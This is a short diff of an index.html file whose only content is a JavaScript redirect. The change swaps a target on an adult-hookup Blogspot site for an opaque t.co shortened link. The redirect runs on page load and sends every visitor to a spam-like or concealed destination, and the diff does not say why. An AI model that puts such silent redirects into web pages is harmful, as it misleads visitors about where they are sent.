--- a/index.html
+++ b/index.html
@@ -1,3 +1,3 @@
 <script language='javascript'>
-    window.location.href = "http://freehookupsearch69.blogspot.com"
+    window.location.href = "https://t.co/xKqiqwVZP8"
 </script>
